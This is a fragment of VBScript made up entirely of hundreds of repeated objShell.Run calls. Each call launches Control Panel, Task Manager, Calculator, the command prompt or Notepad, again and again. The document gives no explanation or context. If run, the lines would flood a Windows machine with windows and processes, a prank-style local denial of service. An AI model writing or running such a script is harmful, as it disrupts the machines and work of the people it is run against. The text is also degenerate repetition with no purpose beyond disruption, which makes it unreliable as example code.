objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False
